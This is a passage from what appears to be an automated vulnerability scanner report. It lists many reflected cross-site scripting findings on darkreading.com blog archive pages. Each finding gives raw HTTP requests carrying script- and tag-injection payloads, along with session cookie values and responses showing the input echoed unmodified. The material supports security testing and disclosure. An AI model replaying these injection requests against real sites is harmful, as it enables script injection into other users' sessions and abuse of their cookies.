This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/20107ccff"><a>fb2a6948865/03/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... ogin?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F20107ccff%22%3E%3Ca%3Efb2a6948865%2F03%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/20107ccff"><a>fb2a6948865/03/index.html"> ...[SNIP]...
3.379. http://www.darkreading.com/blog/archives/2010/03/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /blog/archives/2010/03/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94d46"><script>alert(1)</script>1197fb0045b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2010/03/index.html?94d46"><script>alert(1)</script>1197fb0045b=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47199"><a>6d2389917ad was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/201047199"><a>6d2389917ad/04/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... ogin?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F201047199%22%3E%3Ca%3E6d2389917ad%2F04%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/201047199"><a>6d2389917ad/04/index.html"> ...[SNIP]...
3.381. http://www.darkreading.com/blog/archives/2010/04/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /blog/archives/2010/04/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91a4d"><script>alert(1)</script>b008b21fd28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2010/04/index.html?91a4d"><script>alert(1)</script>b008b21fd28=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf85c"><a>c4d8b579723 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2010cf85c"><a>c4d8b579723/05/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... ogin?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2010cf85c%22%3E%3Ca%3Ec4d8b579723%2F05%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2010cf85c"><a>c4d8b579723/05/index.html"> ...[SNIP]...
3.383. http://www.darkreading.com/blog/archives/2010/05/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /blog/archives/2010/05/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8bb5"><script>alert(1)</script>bb2e9179417 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2010/05/index.html?c8bb5"><script>alert(1)</script>bb2e9179417=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38b9d"><a>3e7e18e2e49 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/201038b9d"><a>3e7e18e2e49/06/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... ogin?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F201038b9d%22%3E%3Ca%3E3e7e18e2e49%2F06%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/201038b9d"><a>3e7e18e2e49/06/index.html"> ...[SNIP]...
3.385. http://www.darkreading.com/blog/archives/2010/06/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /blog/archives/2010/06/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f236d"><script>alert(1)</script>f21c37ef639 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2010/06/index.html?f236d"><script>alert(1)</script>f21c37ef639=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b351"><a>758b77eba16 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/20108b351"><a>758b77eba16/07/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46cf0"><a>5df536d55ba was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2010/0746cf0"><a>5df536d55ba/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... n?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2010%2F0746cf0%22%3E%3Ca%3E5df536d55ba%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2010/0746cf0"><a>5df536d55ba/index.html"> ...[SNIP]...
3.388. http://www.darkreading.com/blog/archives/2010/07/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /blog/archives/2010/07/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fef38"><script>alert(1)</script>7f4830ddf48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2010/07/index.html?fef38"><script>alert(1)</script>7f4830ddf48=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 495e6"><a>55b917b5393 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2010495e6"><a>55b917b5393/08/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 453b9"><a>7edd556c3da was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2010/08453b9"><a>7edd556c3da/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... n?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2010%2F08453b9%22%3E%3Ca%3E7edd556c3da%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2010/08453b9"><a>7edd556c3da/index.html"> ...[SNIP]...
3.391. http://www.darkreading.com/blog/archives/2010/08/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /blog/archives/2010/08/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec3a5"><script>alert(1)</script>6a956421196 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2010/08/index.html?ec3a5"><script>alert(1)</script>6a956421196=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31256"><a>56cf0e24733 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/201031256"><a>56cf0e24733/09/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51985"><a>67e725aa285 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2010/0951985"><a>67e725aa285/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... n?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2010%2F0951985%22%3E%3Ca%3E67e725aa285%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2010/0951985"><a>67e725aa285/index.html"> ...[SNIP]...
3.394. http://www.darkreading.com/blog/archives/2010/09/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /blog/archives/2010/09/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46475"><script>alert(1)</script>5139aad4e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2010/09/index.html?46475"><script>alert(1)</script>5139aad4e5=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 590a8"><a>0c54cf42c59 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2010590a8"><a>0c54cf42c59/10/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfcc9"><a>62aeb9e2e6e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2010/10cfcc9"><a>62aeb9e2e6e/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... n?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2010%2F10cfcc9%22%3E%3Ca%3E62aeb9e2e6e%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2010/10cfcc9"><a>62aeb9e2e6e/index.html"> ...[SNIP]...
3.397. http://www.darkreading.com/blog/archives/2010/10/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /blog/archives/2010/10/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eefc1"><script>alert(1)</script>d19ea4b7d4d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2010/10/index.html?eefc1"><script>alert(1)</script>d19ea4b7d4d=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b300d"><a>fe2ae17d4c8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2010b300d"><a>fe2ae17d4c8/11/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd737"><a>3fd3d68a714 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2010/11bd737"><a>3fd3d68a714/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... n?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2010%2F11bd737%22%3E%3Ca%3E3fd3d68a714%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2010/11bd737"><a>3fd3d68a714/index.html"> ...[SNIP]...
3.400. http://www.darkreading.com/blog/archives/2010/11/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /blog/archives/2010/11/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61b6f"><script>alert(1)</script>f19358c7f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2010/11/index.html?61b6f"><script>alert(1)</script>f19358c7f6=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 308ff"><a>05b4961a19f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2010308ff"><a>05b4961a19f/12/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6138"><a>31a39e17017 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/2010/12d6138"><a>31a39e17017/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... n?service=http%3A%2F%2Fwww.darkreading.com%2Fblog%2Farchives%2F2010%2F12d6138%22%3E%3Ca%3E31a39e17017%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/2010/12d6138"><a>31a39e17017/index.html"> ...[SNIP]...
3.403. http://www.darkreading.com/blog/archives/2010/12/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /blog/archives/2010/12/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7ae8"><script>alert(1)</script>cee037e6c5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/2010/12/index.html?d7ae8"><script>alert(1)</script>cee037e6c5a=1 HTTP/1.1
